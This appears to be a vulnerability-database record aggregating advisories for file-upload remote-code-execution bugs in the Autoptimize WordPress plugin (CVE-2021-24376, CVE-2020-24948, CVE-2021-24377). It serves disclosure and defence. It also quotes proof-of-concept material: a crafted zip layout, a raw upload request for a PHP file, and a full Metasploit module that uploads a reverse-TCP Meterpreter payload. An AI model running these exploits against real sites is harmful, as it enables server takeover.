The Autoptimize WordPress plugin before 2.7.8 attempts to delete malicious files (such as .php) form the uploaded archive via the "Import Settings" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the "Import Settings" functionality to achieve Remote Code Execution.
{"id": "CVE-2021-24376", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24376", "description": "The Autoptimize WordPress plugin before 2.7.8 attempts to delete malicious files (such as .php) form the uploaded archive via the \"Import Settings\" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the \"Import Settings\" functionality to achieve Remote Code Execution.", "published": "2021-06-21T20:15:00", "modified": "2021-09-20T17:10:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24376", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e"], "cvelist": ["CVE-2020-24948", "CVE-2021-24376"], "immutableFields": [], "lastseen": "2022-03-23T14:53:29", "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-24948", "CVE-2021-24377"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160850"]}, {"type": "wpexploit", "idList": ["WPEX-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "WPEX-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "WPVDB-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}]}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-24948"]}, {"type": "wpexploit", "idList": ["WPEX-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-434"], "affectedSoftware": [{"cpeName": "autoptimize:autoptimize", "version": "2.7.8", "operator": "lt", "name": "autoptimize"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:autoptimize:autoptimize:2.7.8:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.7.8", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e", "name": "https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpexploit": [{"lastseen": "2021-06-14T11:34:12", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24376"], "description": "The plugin attempts to delete malicious files (such as .php) form the uploaded archive via the \"Import Settings\" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the \"Import Settings\" functionality to achieve Remote Code Execution. \n", "modified": "2021-06-07T05:59:32", "published": "2020-10-09T00:00:00", "id": "WPEX-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E", "href": "", "type": "wpexploit", "title": "Autoptimize < 2.7.8 - Arbitrary File Upload via \"Import Settings\"", "sourceData": "Regularly, zip which contained a PHP file was extracted, but the PHP extension was not on a white list so it was removed from the disk afterwards. It turned out that it is possible to upload a zip which contained a directory with PHP file in it and then it was not removed from the disk. \r\n\r\nUpload can be done using Import Settings functionality available in the following directory: http://localhost:8000/wp-content/uploads/ao_ccss/dir/wp-admin/options-general.php?page=ao_critcss \r\n\r\nExample content of an archive:\r\n$ zip -sf rce.zip\r\nArchive contains:\r\n dir/\r\n dir/index.php\r\n settings.json\r\nTotal 3 entries (20 bytes)\r\n\r\nExample content of dir/index.php file:\r\n<?php phpinfo() ?>\r\n\r\nsettings.json is an empty file.\r\n\r\nAs you can see, there is a \"dir\" directory inside a zip which contains index.php file. Both will not be removed from the disk after being extracted. After the upload, file can be accessed by visiting such address: http://localhost:8000/wp-content/uploads/ao_ccss/dir/ \r\n\r\nDue to the fact that file is named index.php, there was no need to include file name in the address.", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-15T22:09:08", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-24948"], "description": "The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.\n", "modified": "2020-09-04T05:00:08", "published": "2020-08-24T00:00:00", "id": "WPEX-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "href": "", "type": "wpexploit", "title": "Autoptimize < 2.7.7 - Authenticated Arbitrary File Upload", "sourceData": "https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://example.com/wp-admin/options-general.php?page=ao_critcss\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080\r\nContent-Length: 504\r\nConnection: close\r\nCookie: [Admin Cookies]\r\n\r\n-----------------------------161325441624547204062709166080\r\nContent-Disposition: form-data; name=\"file\"; filename=\"rce.php\"\r\nContent-Type: application/zip\r\n\r\n<?php phpinfo() ?>\r\n-----------------------------161325441624547204062709166080\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nao_ccss_import\r\n-----------------------------161325441624547204062709166080\r\nContent-Disposition: form-data; name=\"ao_ccss_import_nonce\"\r\n\r\n6df2d6b321\r\n-----------------------------161325441624547204062709166080--\r\n\r\n\r\nEven if the request generates an error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-06-14T11:34:12", "bulletinFamily": "software", "cvelist": ["CVE-2021-24376"], "description": "The plugin attempts to delete malicious files (such as .php) form the uploaded archive via the \"Import Settings\" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the \"Import Settings\" functionality to achieve Remote Code Execution. \n\n### PoC\n\nRegularly, zip which contained a PHP file was extracted, but the PHP extension was not on a white list so it was removed from the disk afterwards. It turned out that it is possible to upload a zip which contained a directory with PHP file in it and then it was not removed from the disk. Upload can be done using Import Settings functionality available in the following directory: http://localhost:8000/wp-content/uploads/ao_ccss/dir/wp-admin/options-general.php?page=ao_critcss Example content of an archive: $ zip -sf rce.zip Archive contains: dir/ dir/index.php settings.json Total 3 entries (20 bytes) Example content of dir/index.php file: settings.json is an empty file. As you can see, there is a \"dir\" directory inside a zip which contains index.php file. Both will not be removed from the disk after being extracted. After the upload, file can be accessed by visiting such address: http://localhost:8000/wp-content/uploads/ao_ccss/dir/ Due to the fact that file is named index.php, there was no need to include file name in the address.\n", "modified": "2021-06-07T05:59:32", "id": "WPVDB-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E", "href": "https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e", "published": "2020-10-09T00:00:00", "type": "wpvulndb", "title": "Autoptimize < 2.7.8 - Arbitrary File Upload via \"Import Settings\"", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-15T22:09:08", "bulletinFamily": "software", "cvelist": ["CVE-2020-24948"], "description": "The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.\n\n### PoC\n\nhttps://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080 Content-Length: 504 Connection: close Cookie: [Admin Cookies] \\-----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=\"file\"; filename=\"rce.php\" Content-Type: application/zip \\-----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=\"action\" ao_ccss_import \\-----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=\"ao_ccss_import_nonce\" 6df2d6b321 \\-----------------------------161325441624547204062709166080-- Even if the request generates an error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php\n", "modified": "2020-09-04T05:00:08", "published": "2020-08-24T00:00:00", "id": "WPVDB-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "href": "https://wpscan.com/vulnerability/56dc9a8c-05ae-4881-a92e-e213eab866a0", "type": "wpvulndb", "title": "Autoptimize < 2.7.7 - Authenticated Arbitrary File Upload", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:34:05", "description": "Arbitrary File Upload via \"Import Settings\" vulnerability discovered by Marcin W\u0119g\u0142owski in WordPress Autoptimize plugin (versions <= 2.7.7).\n\n## Solution\n\n\r\n Update the WordPress Autoptimize plugin to the latest available version (at least 2.7.8).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-09T00:00:00", "type": "patchstack", "title": "WordPress Autoptimize plugin <= 2.7.7 - Arbitrary File Upload via \"Import Settings\" vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24376"], "modified": "2020-10-09T00:00:00", "id": "PATCHSTACK:027D7F5A807352C0EB139AC726619FCF", "href": "https://patchstack.com/database/vulnerability/autoptimize/wordpress-autoptimize-plugin-2-7-7-arbitrary-file-upload-via-import-settings-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-01T19:34:31", "description": "Authenticated Arbitrary File Upload vulnerability found by Nguyen Van Khanh (SunCSR) in WordPress Autoptimize plugin (versions <= 2.7.6).\n\n## Solution\n\n\r\n Update the WordPress Autoptimize plugin to the latest available version (at least <= 2.7.7).\r\n ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-24T00:00:00", "type": "patchstack", "title": "WordPress Autoptimize plugin <= 2.7.6 - Authenticated Arbitrary File Upload vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24948"], "modified": "2020-08-24T00:00:00", "id": "PATCHSTACK:6B05DD1261702D4767C1CA08194B518D", "href": "https://patchstack.com/database/vulnerability/autoptimize/wordpress-autoptimize-plugin-2-7-6-authenticated-arbitrary-file-upload-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T15:33:48", "description": "The ao_ccss_import AJAX call in Autoptimize Wordpress Plugin 2.7.6 does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to remote command execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-03T15:15:00", "type": "cve", "title": "CVE-2020-24948", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24948"], "modified": "2021-03-04T20:45:00", "cpe": [], "id": "CVE-2020-24948", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24948", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:53:30", "description": "The Autoptimize WordPress plugin before 2.7.8 attempts to remove potential malicious files from the extracted archive uploaded via the 'Import Settings' feature, however this is not sufficient to protect against RCE as a race condition can be achieved in between the moment the file is extracted on the disk but not yet removed. It is a bypass of CVE-2020-24948.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T20:15:00", "type": "cve", "title": "CVE-2021-24377", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24948", "CVE-2021-24377"], "modified": "2021-09-20T17:10:00", "cpe": [], "id": "CVE-2021-24377", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24377", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-01-08T15:49:06", "description": "", "published": "2021-01-08T00:00:00", "type": "packetstorm", "title": "WordPress Autoptimize Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-24948"], "modified": "2021-01-08T00:00:00", "id": "PACKETSTORM:160850", "href": "https://packetstormsecurity.com/files/160850/WordPress-Autoptimize-Shell-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info( \ninfo, \n'Name' => 'Wordpress Autoptimize Authenticated File Upload', \n'Description' => %q{ \nThe ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, \nallowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. \n}, \n'Author' => \n[ \n'Khanh Nguyen - Suncsr Team', # Vulnerability discovery \n'Hoa Nguyen - Suncsr Team', # Metasploit module \n'Thien Ngo - Suncsr Team' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2020-24948'], \n['EDB', '48770'], \n['WPVDB', '10372'] \n], \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp' \n}, \n'Targets' => [['WP Autoptimize 2.7.6', {}]], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-08-24')) \n \nregister_options( \n[ \nOptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]), \nOptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil]) \n]) \nend \n \ndef check \ncheck_plugin_version_from_readme('autoptimize','2.7.7') \nend \n \ndef ao_ccss_import_nonce(cookie) \nres = send_request_cgi({ \n'uri' => normalize_uri(wordpress_url_backend,'options-general.php'), \n'cookie' => cookie, \n'vars_get' => { \n'page' => 'ao_critcss' \n} \n},5) \n \nif res.code == 200 \nprint_good(\"Found ao_ccss_import_nonce_code Value!\") \nelse \nfail_with(Failure::Unknown,'Server did not response in an expected way') \nend \n \nao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\\w+)/).captures[0] \nreturn ao_ccss_import_nonce_code \nend \n \ndef exploit \nusername = datastore['USERNAME'] \npassword = datastore['PASSWORD'] \nprint_status(\"Trying to login as #{username}\") \ncookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD']) \nif cookie.nil? \nprint_error(\"Unable to login as #{username}\") \nend \n \nvars = ao_ccss_import_nonce(cookie) \nprint_status(\"Trying to upload payload\") \nfilename = \"#{rand_text_alpha_lower(8)}.php\" \n \ndata = Rex::MIME::Message.new \ndata.add_part('ao_ccss_import', nil, nil, 'form-data; name=\"action\"') \ndata.add_part(vars, nil, nil, 'form-data; name=\"ao_ccss_import_nonce\"') \ndata.add_part(payload.encoded, 'application/zip', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{filename}\\\"\") \npost_data = data.to_s \nprint_status(\"Uploading payload\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'cookie' => cookie \n}) \n \nif res.code == 200 \nregister_files_for_cleanup(filename) \nelse \nfail_with(Failure::Unknown,'Server did not response in an expected way') \nend \n \nprint_status(\"Calling uploaded file #{filename}\") \nsend_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5) \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160850/wpautoptimize276-shell.rb.txt"}]}